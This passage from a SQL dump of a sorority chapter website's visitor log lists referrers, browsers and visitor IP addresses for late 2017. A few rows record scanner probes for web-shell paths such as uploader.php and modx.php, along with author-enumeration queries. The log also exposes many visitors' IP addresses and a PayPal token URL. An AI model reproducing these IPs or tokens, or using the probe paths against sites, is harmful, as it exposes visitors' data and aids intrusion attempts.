x','Windows','41.0','','175.42.44.95','000',9,0),(13373,'2017-10-31','https://zphiblgz.org','Chrome','Linux','36.0.1985.125','','175.42.44.95','000',1,0),(13374,'2017-10-31','https://zphiblgz.org','Safari','iPhone','7.0','','175.42.44.95','000',1,0),(13375,'2017-10-31','https://zphiblgz.org','Firefox','Windows','34.0','','94.25.171.101','000',1,0),(13376,'2017-10-31','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13377,'2017-10-31','https://zphiblgz.org','Firefox','Windows','40.1','','85.101.159.162','000',3,0),(13378,'2017-10-31','https://zphiblgz.org','Firefox','Windows','40.1','','59.93.24.78','000',3,0),(13379,'2017-10-31','http://zphiblgz.org/','Firefox','Windows','26.0','','156.67.106.49','000',1,0),(13380,'2017-10-31','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','39.40.88.196','000',3,0),(13381,'2017-10-31','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.213.24','000',1,0),(13382,'2017-10-31','http://site.ru','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(13383,'2017-10-31','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.249.80.38','000',1,0),(13384,'2017-10-31','http://zphiblgz.org/ts_teams/sandra-hudson/','Chrome','Linux','41.0.2272.118','','66.249.80.44','000',1,0),(13385,'2017-10-31','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(13386,'2017-10-31','https://zphiblgz.org','Safari','iPhone','6.0','','106.120.173.85','000',2,0),(13387,'2017-10-31','https://zphiblgz.org/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','Safari','iPhone','11.0','','174.205.10.68','000',2,0),(13388,'2017-10-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.63','000',1,0),(13389,'2017-10-31','https://www.google.com/','Chrome','Windows','61.0.3163.100','','104.59.42.159','000',3,0),(13390,'2017-10-31','https://www.bing.com/','Edge','Windows','15.15063','','173.67.3.36','000',2,0),(13391,'2017-10-31','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.24','000',1,0),(13392,'2017-10-31','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0ahUKEwiX96HN-pvXAhWFeCYKHWwwDvM4ChAWCD8wBA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','69.171.20.30','000',2,0),(13393,'2017-10-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.56','000',1,0),(13394,'2017-10-31','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.69','000',1,0),(13395,'2017-10-31','https://zphiblgz.org','Firefox','Windows','40.1','','117.58.247.14','000',3,0),(13396,'2017-10-31','https://zphiblgz.org','Firefox','Windows','40.1','','73.151.129.118','000',3,0),(13397,'2017-10-31','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.60','000',1,0),(13398,'2017-10-31','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.121','000',1,0),(13399,'2017-11-01','https://zphiblgz.org','Firefox','Windows','40.1','','112.198.73.80','000',3,0),(13400,'2017-11-01','https://zphiblgz.org','Safari','Macintosh','10.0.3','','46.229.170.197','000',1,0),(13401,'2017-11-01','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.219.178.100','000',2,0),(13402,'2017-11-01','http://zphiblgz.org/','Chrome','Windows','29.0.1547.66','','185.195.27.169','000',3,0),(13403,'2017-11-01','http://www.zphiblgz.org','Firefox','Macintosh','54.0','','104.131.190.117','000',2,0),(13404,'2017-11-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.131.190.117','000',1,0),(13405,'2017-11-01','https://zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','104.131.190.117','000',1,0),(13406,'2017-11-01','https://zphiblgz.org','Chrome','Macintosh','60.0.3112.90','','104.131.190.117','000',2,0),(13407,'2017-11-01','https://zphiblgz.org','MSIE','Windows','10.0','','104.131.190.117','000',2,0),(13408,'2017-11-01','https://zphiblgz.org','Firefox','Windows','54.0','','104.131.190.117','000',4,0),(13409,'2017-11-01','https://zphiblgz.org','Safari','Macintosh','10.0.3','','104.131.190.117','000',1,0),(13410,'2017-11-01','https://zphiblgz.org','Firefox','Linux','47.0','','104.131.190.117','000',2,0),(13411,'2017-11-01','https://zphiblgz.org','Firefox','Linux','54.0','','104.131.190.117','000',1,0),(13412,'2017-11-01','https://zphiblgz.org','Chrome','Linux','59.0.3071.115','','104.131.190.117','000',1,0),(13413,'2017-11-01','https://zphiblgz.org','Chrome','Macintosh','58.0.3029.81','','104.131.190.117','000',1,0),(13414,'2017-11-01','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.75','000',2,0),(13415,'2017-11-01','https://zphiblgz.org','Firefox','Windows','40.1','','97.86.69.234','000',3,0),(13416,'2017-11-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.58.178.56','000',13,0),(13417,'2017-11-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.35','000',1,0),(13418,'2017-11-01','https://www.google.com/search?q=zeta+phi+beta&ie=utf-8&num=100&oe=utf-8&hl=en&gl=US&uule=w+CAIQIFISCQs2MuSEtepUEUK33kOSuTsc&glp=1&gws_rd=cr&fg=1','Firefox','Windows','40.1','','5.34.58.113','000',2,0),(13419,'2017-11-01','http://search.yahoo.co.jp/','MSIE','Windows','11.0','','106.72.163.192','000',2,0),(13420,'2017-11-01','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.149','000',1,0),(13421,'2017-11-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.143','000',1,0),(13422,'2017-11-01','http://zphiblgz.org/?author=%7Bnum:1%7D','MSIE','Windows','6.0','','37.229.44.61','000',10,0),(13423,'2017-11-01','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.89','000',2,0),(13424,'2017-11-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.85','000',2,0),(13425,'2017-11-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(13426,'2017-11-01','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','185.100.86.100','000',2,0),(13427,'2017-11-01','https://zphiblgz.org','Firefox','Linux','47.0','','138.197.111.100','000',3,0),(13428,'2017-11-01','https://zphiblgz.org','Firefox','Windows','40.1','','62.103.173.92','000',3,0),(13429,'2017-11-01','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13430,'2017-11-01','https://www.google.com/','Safari','iPhone','11.0','','173.73.231.157','000',2,0),(13431,'2017-11-02','https://zphiblgz.org','Firefox','Windows','40.1','','182.180.162.137','000',2,0),(13432,'2017-11-02','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.132.5','000',1,0),(13433,'2017-11-02','https://zphiblgz.org','Chrome','Windows','55.0.2883.87','','62.75.137.71','000',2,0),(13434,'2017-11-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.76','000',1,0),(13435,'2017-11-02','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.25.191','000',1,0),(13436,'2017-11-02','https://zphiblgz.org','Firefox','Windows','34.0','','5.187.69.192','000',1,0),(13437,'2017-11-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.84','000',1,0),(13438,'2017-11-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(13439,'2017-11-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.116','000',1,0),(13440,'2017-11-02','https://zphiblgz.org','Firefox','Windows','40.1','','83.27.83.16','000',3,0),(13441,'2017-11-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.123','000',1,0),(13442,'2017-11-02','http://www.zphibmaryland.org/chapters/','Chrome','Android','61.0.3163.98','','68.134.7.245','000',9,0),(13443,'2017-11-02','http://www.zphibmaryland.org/chapters/','Chrome','Android','56.0.2924.87','','24.126.118.112','000',9,0),(13444,'2017-11-02','https://zphiblgz.org','Chrome','iPhone','62.0.3202.70','','204.126.132.241','000',4,0),(13445,'2017-11-02','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','204.126.132.241','000',6,0),(13446,'2017-11-02','https://www.google.com/','Chrome','Windows','61.0.3163.100','','104.48.216.181','000',1,0),(13447,'2017-11-02','https://zphiblgz.org','Firefox','Windows','40.1','','109.182.235.30','000',3,0),(13448,'2017-11-02','https://zphiblgz.org','AppleWebKit','Linux','534.34','','52.38.208.88','000',2,0),(13449,'2017-11-02','https://zphiblgz.org','Go--client','Unknown','1.1','','217.182.88.191','000',1,0),(13450,'2017-11-02','http://zphiblgz.org','Go--client','Unknown','2.0','','217.182.88.191','000',1,0),(13451,'2017-11-02','https://www.google.com/','Chrome','Windows','62.0.3202.62','','68.134.7.245','000',10,0),(13452,'2017-11-02','https://zphiblgz.org','Chrome','Windows','27.0.1453.90','','148.251.54.44','000',1,0),(13453,'2017-11-02','https://zphiblgz.org','Firefox','Windows','40.1','','138.118.98.134','000',3,0),(13454,'2017-11-02','http://zphiblgz.org/','Opera Next','Windows','45.0.2552.812','','163.172.4.153','000',1,0),(13455,'2017-11-02','https://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','163.172.4.153','000',1,0),(13456,'2017-11-02','https://zphiblgz.org','Firefox','Windows','40.1','','75.177.136.64','000',3,0),(13457,'2017-11-02','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','73.213.165.2','000',3,0),(13458,'2017-11-02','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(13459,'2017-11-02','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.215','000',1,0),(13460,'2017-11-03','https://www.google.com/','Firefox','Macintosh','52.0','','96.234.147.87','000',3,0),(13461,'2017-11-03','https://zphiblgz.org','Chrome','Windows','50.0.2661.94','','192.187.101.170','000',2,0),(13462,'2017-11-03','https://zphiblgz.org','Firefox','Windows','40.1','','86.125.226.36','000',3,0),(13463,'2017-11-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','176.31.191.186','000',7,0),(13464,'2017-11-03','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.91.46','000',2,0),(13465,'2017-11-03','zphiblgz.org','Chrome','Windows','47.0.1335.75','','49.50.8.223','000',1,0),(13466,'2017-11-03','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.165','000',1,0),(13467,'2017-11-03','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.219','000',1,0),(13468,'2017-11-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.212','000',1,0),(13469,'2017-11-03','https://zphiblgz.org','Chrome','Windows','28.0.1500.95','','34.201.34.169','000',2,0),(13470,'2017-11-03','https://www.paypal.com/webapps/hermes?flow=1-P&ulReturn=true&token=EC-1SD171894T938863P&country.x=US&locale.x=en_US','Chrome','iPhone','62.0.3202.70','','174.204.7.168','000',1,0),(13471,'2017-11-03','https://zphiblgz.org','G-i-g-a-b-o-t','Unknown','Unknown','','65.132.59.34','000',2,0),(13472,'2017-11-03','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','93.115.95.202','000',2,0),(13473,'2017-11-03','https://zphiblgz.org','Safari','iPhone','9.0','','139.212.118.209','000',1,0),(13474,'2017-11-03','https://zphiblgz.org','Safari','iPhone','9.0','','113.128.104.214','000',1,0),(13475,'2017-11-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','14.161.34.69','000',3,0),(13476,'2017-11-03','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13477,'2017-11-03','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(13478,'2017-11-03','https://zphiblgz.org','Firefox','Windows','34.0','','188.187.184.6','000',1,0),(13479,'2017-11-03','https://zphiblgz.org','Safari','iPhone','11.0','','73.128.242.163','000',3,0),(13480,'2017-11-03','zphiblgz.org','Chrome','Windows','47.0.1335.75','','176.31.107.99','000',1,0),(13481,'2017-11-03','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.0','000',2,0),(13482,'2017-11-03','http://zphiblgz.org/','Opera Next','Windows','44.0.2510.857','','37.115.155.222','000',3,0),(13483,'2017-11-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(13484,'2017-11-03','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','96.244.96.210','000',5,0),(13485,'2017-11-03','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(13486,'2017-11-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.51','000',1,0),(13487,'2017-11-03','https://www.google.com/','Safari','Macintosh','11.0','','107.0.151.178','000',1,0),(13488,'2017-11-03','https://zphiblgz.org','Safari','iPhone','6.0','','218.30.103.3','000',2,0),(13489,'2017-11-03','https://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',2,0),(13490,'2017-11-03','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(13491,'2017-11-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(13492,'2017-11-03','https://zphiblgz.org','Firefox','Windows','40.1','','69.142.8.79','000',3,0),(13493,'2017-11-03','https://www.google.com/','Chrome','Windows','61.0.3163.100','','67.237.32.213','000',2,0),(13494,'2017-11-03','https://zphiblgz.org','Chrome','Windows','41.0.2227.0','','195.22.127.227','000',1,0),(13495,'2017-11-03','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.195.134','000',2,0),(13496,'2017-11-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.62','000',1,0),(13497,'2017-11-03','https://zphiblgz.org','Firefox','Windows','40.1','','201.21.62.57','000',3,0),(13498,'2017-11-03','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.202','000',1,0),(13499,'2017-11-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.214','000',1,0),(13500,'2017-11-03','https://www.google.com/','Chrome','Windows','61.0.3163.100','','173.94.240.138','000',2,0),(13501,'2017-11-03','https://www.google.com/','Chrome','Macintosh','61.0.3163.100','','100.15.160.57','000',10,0),(13502,'2017-11-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.78','000',1,0),(13503,'2017-11-03','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','138.197.85.80','000',1,0),(13504,'2017-11-03','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(13505,'2017-11-03','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.97.86','000',1,0),(13506,'2017-11-04','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.19','000',1,0),(13507,'2017-11-04','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.200.169.88','000',2,0),(13508,'2017-11-04','https://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(13509,'2017-11-04','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.90','000',1,0),(13510,'2017-11-04','http://zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.91','000',1,0),(13511,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.98','000',1,0),(13512,'2017-11-04','https://zphiblgz.org','Firefox','Windows','56.0','','39.40.21.133','000',3,0),(13513,'2017-11-04','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','39.40.21.133','000',6,0),(13514,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','143.95.38.87','000',1,0),(13515,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','202.181.99.22','000',1,0),(13516,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','186.202.95.140','000',1,0),(13517,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','81.27.85.13','000',1,0),(13518,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','68.142.232.16','000',1,0),(13519,'2017-11-04','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.78','000',1,0),(13520,'2017-11-04','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.95','000',1,0),(13521,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.114','000',2,0),(13522,'2017-11-04','https://zphiblgz.org','Firefox','Windows','40.1','','177.79.37.224','000',2,0),(13523,'2017-11-04','https://zphiblgz.org','Firefox','Windows','40.1','','177.79.82.14','000',1,0),(13524,'2017-11-04','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','45.55.225.186','000',18,0),(13525,'2017-11-04','https://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.159.88','000',1,0),(13526,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.111.175','000',3,0),(13527,'2017-11-04','https://zphiblgz.org','MSIE','Windows','11.0','','172.82.185.210','000',2,0),(13528,'2017-11-04','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.178.108','000',1,0),(13529,'2017-11-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(13530,'2017-11-04','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','24.3.211.195','000',5,0),(13531,'2017-11-04','https://zphiblgz.org','Firefox','Windows','40.1','','187.13.217.138','000',3,0),(13532,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.116','000',1,0),(13533,'2017-11-04','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(13534,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.121','000',1,0),(13535,'2017-11-04','https://zphiblgz.org','Firefox','Windows','40.1','','82.102.254.248','000',3,0),(13536,'2017-11-04','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','198.46.203.138','000',2,0),(13537,'2017-11-04','https://zphiblgz.org/','Opera','Windows','12.17','','198.46.203.138','000',4,0),(13538,'2017-11-04','https://zphiblgz.org/','PHP','Unknown','5.2.98','','198.46.203.138','000',1,0),(13539,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','193.143.77.10','000',1,0),(13540,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.49.204.205','000',1,0),(13541,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','65.19.169.34','000',1,0),(13542,'2017-11-04','https://www.google.com/','Chrome','Windows','61.0.3163.100','','64.53.143.75','000',8,0),(13543,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','79.170.40.43','000',1,0),(13544,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','210.134.165.2','000',1,0),(13545,'2017-11-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','219.94.192.47','000',1,0),(13546,'2017-11-04','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',1,0),(13547,'2017-11-05','https://zphiblgz.org','Firefox','Windows','34.0','','78.85.142.161','000',1,0),(13548,'2017-11-05','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13549,'2017-11-05','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','198.27.80.144','000',2,0),(13550,'2017-11-05','https://zphiblgz.org','Firefox','Windows','40.1','','73.81.122.57','000',3,0),(13551,'2017-11-05','https://zphiblgz.org','Firefox','Windows','40.1','','95.92.66.96','000',3,0),(13552,'2017-11-05','https://zphiblgz.org','Chrome','Windows','28.0.1500.95','','54.211.12.152','000',16,0),(13553,'2017-11-05','http://zphiblgz.org/','Opera','Windows','12.17','','146.185.223.95','000',1,0),(13554,'2017-11-05','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','66.45.243.194','000',1,0),(13555,'2017-11-05','http://zphiblgz.org','Unknown','Unknown','Unknown','','66.45.243.205','000',1,0),(13556,'2017-11-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.244.93','000',1,0),(13557,'2017-11-05','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','171.25.193.78','000',1,0),(13558,'2017-11-05','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','217.182.207.27','000',1,0),(13559,'2017-11-05','http://site.ru','Chrome','Windows','5.0.375.99','','91.103.217.26','000',2,0),(13560,'2017-11-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(13561,'2017-11-05','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(13562,'2017-11-05','http://site.ru','Chrome','Windows','5.0.375.99','','50.116.73.24','000',2,0),(13563,'2017-11-05','https://zphiblgz.org','Chrome','Windows','62.0.3202.75','','69.138.174.144','000',8,0),(13564,'2017-11-05','https://zphiblgz.org','Mnogosearch-3','Unknown','Unknown','','173.49.24.118','000',1,0),(13565,'2017-11-05','https://zphiblgz.org','Firefox','Windows','19.0','','5.188.211.72','000',1,0),(13566,'2017-11-05','https://zphiblgz.org','Firefox','Windows','34.0','','62.183.86.133','000',1,0),(13567,'2017-11-05','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.80','000',1,0),(13568,'2017-11-05','https://zphiblgz.org','Chrome','Chrome OS','60.0.3112.114','','69.143.35.179','000',2,0),(13569,'2017-11-05','https://zphiblgz.org','Safari','iPad','11.0','','71.121.204.212','000',3,0),(13570,'2017-11-06','https://zphiblgz.org','Firefox','Linux','3.6.4','','46.105.100.183','000',35,0),(13571,'2017-11-06','http://zphiblgz.org/wp-content/modx.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(13572,'2017-11-06','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','93.115.95.207','000',1,0),(13573,'2017-11-06','https://zphiblgz.org','MSIE','Windows','6.0','','198.204.244.162','000',2,0),(13574,'2017-11-06','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','146.185.223.5','000',3,0),(13575,'2017-11-06','http://google.com','Firefox','Windows','24.0','','95.46.45.83','000',2,0),(13576,'2017-11-06','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.151','000',1,0),(13577,'2017-11-06','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.196','000',1,0),(13578,'2017-11-06','http://zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.216','000',1,0),(13579,'2017-11-06','http://site.ru','Chrome','Windows','5.0.375.99','','143.95.42.124','000',1,0),(13580,'2017-11-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','205.201.132.14','000',10,0),(13581,'2017-11-06','https://zphiblgz.org','MSIE','Windows','11.0','','149.101.1.115','000',5,0),(13582,'2017-11-06','https://www.google.com/','Chrome','Windows','61.0.3163.100','','173.62.219.151','000',1,0),(13583,'2017-11-06','https://zphiblgz.org','redback','Unknown','v0','','109.236.8.10','000',4,0),(13584,'2017-11-06','https://zphiblgz.org','Firefox','Windows','34.0','','31.28.212.18','000',1,0),(13585,'2017-11-06','https://www.google.com/','Chrome','Windows','61.0.3163.100','','167.102.191.10','000',5,0),(13586,'2017-11-06','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','69.195.247.116','000',8,0),(13587,'2017-11-06','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.132','000',2,0),(13588,'2017-11-06','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.134','000',2,0),(13589,'2017-11-06','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.131','000',1,0),(13590,'2017-11-06','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.140','000',1,0),(13591,'2017-11-06','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.16.35','000',3,0),(13592,'2017-11-06','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.62','','128.229.4.2','000',3,0),(13593,'2017-11-06','https://www.google.com/','Firefox','Windows','56.0','','71.179.27.243','000',12,0),(13594,'2017-11-06','https://zphiblgz.org','Firefox','Windows','56.0','','198.28.62.3','000',4,0),(13595,'2017-11-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',19,0),(13596,'2017-11-06','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',4,0),(13597,'2017-11-06','https://zphiblgz.org','MetaURI','Unknown','Unknown','','88.99.29.5','000',3,0),(13598,'2017-11-06','https://zphiblgz.org','MetaURI','Unknown','Unknown','','136.243.154.100','000',3,0),(13599,'2017-11-06','https://zphiblgz.org','Firefox','Linux','2.0.0.2','','144.76.163.211','000',2,0),(13600,'2017-11-06','https://zphiblgz.org','Firefox','Linux','3.5.1','','144.76.22.234','000',2,0),(13601,'2017-11-06','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwi04Jqz5KrXAhVkB8AKHXG6AM8QFgg4MAI&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','192.149.13.30','000',3,0),(13602,'2017-11-06','https://zphiblgz.org','Chrome','Windows','62.0.3202.62','','198.51.197.174','000',1,0),(13603,'2017-11-06','http://m.facebook.com','Safari','iPhone','10.0','','173.252.124.60','000',1,0),(13604,'2017-11-06','https://zphiblgz.org/scholarship/','Safari','iPhone','10.0','','173.252.124.59','000',1,0),(13605,'2017-11-06','https://zphiblgz.org','Chrome','Macintosh','35.0.1916.153','','54.176.137.163','000',2,0),(13606,'2017-11-06','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.179.222','000',1,0),(13607,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','173.69.191.119','000',2,0),(13608,'2017-11-06','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.109','000',2,0),(13609,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',4,0),(13610,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','73.250.46.169','000',2,0),(13611,'2017-11-06','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','24.191.177.56','000',2,0),(13612,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','76.108.86.40','000',2,0),(13613,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','38.122.237.66','000',2,0),(13614,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','172.56.2.243','000',2,0),(13615,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','166.137.244.64','000',2,0),(13616,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','173.69.191.172','000',2,0),(13617,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','76.106.122.133','000',2,0),(13618,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.212.235.204','000',2,0),(13619,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','207.244.65.228','000',2,0),(13620,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','96.244.137.228','000',3,0),(13621,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','71.115.13.157','000',2,0),(13622,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','73.222.216.77','000',2,0),(13623,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','166.137.240.33','000',2,0),(13624,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','174.221.139.186','000',2,0),(13625,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','96.244.67.199','000',4,0),(13626,'2017-11-06','http://m.facebook.com/','Chrome','Android','61.0.3163.98','','72.27.215.114','000',2,0),(13627,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.191.100.111','000',2,0),(13628,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','96.231.202.104','000',2,0),(13629,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.2.4','','68.134.17.112','000',2,0),(13630,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','69.137.59.175','000',2,0),(13631,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','172.58.232.225','000',2,0),(13632,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','172.56.2.225','000',2,0),(13633,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.87.110.27','000',2,0),(13634,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','73.135.241.194','000',2,0),(13635,'2017-11-06','https://www.facebook.com/','Chrome','Windows','62.0.3202.89','','68.134.8.97','000',3,0),(13636,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','74.174.50.9','000',2,0),(13637,'2017-11-06','http://m.facebook.com','AppleWebKit','iPad','604.1.38','','73.173.158.193','000',2,0),(13638,'2017-11-06','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','96.255.